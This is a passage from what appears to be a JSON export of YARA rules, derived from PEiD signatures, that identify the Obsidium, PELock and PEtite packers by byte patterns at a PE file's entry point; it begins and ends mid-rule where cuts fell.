Obsidium_1322_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1353_Obsidium_Software_20080120: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2B 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1360_Obsidium_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 50 EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 1F EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 01 ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 ?? 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 02 ?? ?? EB 02 ?? ?? 64 8F 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1341_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1334_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1353_Obsidium_Software_SignByfly_20080120: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2B 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 }\r\n        $b = { EB 02 ?? ?? E8 2B 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1354_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Softwarenbsp_nbsp_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 C3 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V125_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1361_Obsidium_Software_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 ?? EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 01 ?? EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 01 ?? EB 03 ?? ?? ?? 64 8F 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? 58 EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12X_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 33 C0 8B 54 24 0C 83 82 B8 00 00 00 0D C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1332_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 3B 27 00 00 }\r\n        $b = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_vxxxx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 47 19 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1200_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 3F 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1333_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1339_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V130X_Obsidium_Software_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B ?? ?? ?? EB 04 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1304_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13017_Obsidium_software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1332_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 3B 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1354_Obsidium_Software_SignByfly_200800207: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 5B 28 00 00 }\r\n        $b = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1322_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1331_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1300_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v10059_Final: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AF }\r\n        $b = { E8 AB 1C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }\r\n        $b = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v1331_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1311_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software_: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1337_20070623_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 F7 26 00 00 }\r\n        $b = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Softwarenbsp_nbsp_SignByfly_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1250_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13021_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 114,
            "key": "yara_detect_pelock",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Pelock",
            "rule": "rule Pelock_10x: PEiD\r\n{\r\n    strings:\r\n        $a = { 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 4B 45 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCKnt_204: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCKnt_204_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCknt_201: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD 20 EB 60 EB 03 CD 20 03 E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 04 CD EB 03 CD EB 02 CD 20 EB 03 CD 20 EA FC EB 03 CD 20 69 E8 00 00 00 00 EB 02 EB 01 EB 01 EB 5E EB 03 CD 20 EB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCknt_203: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 C7 85 1E EB 03 CD 20 C7 9C EB 02 69 B1 60 EB 02 EB 01 EB 01 EB E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 01 EB EB 02 CD 20 EB 03 CD 20 EB FC EB 02 C7 85 E8 00 00 00 00 EB 03 CD 20 EA 5E EB 03 CD 20 69 0F 01 4E F4 EB 03 CD 20 EB EB 01 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCknt_202: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD 20 60 EB 03 CD 20 EB E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 04 CD 20 EB 02 EB 02 CD 20 EB 03 CD 20 EA FC EB 03 CD 20 69 E8 00 00 00 00 EB 02 EB 01 EB 01 EB 5E EB 02 CD 20 0F 01 4E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 110,
            "key": "yara_detect_petite",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Petite",
            "rule": "rule PEtite_v20_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A 00 FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_PEtite_21_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 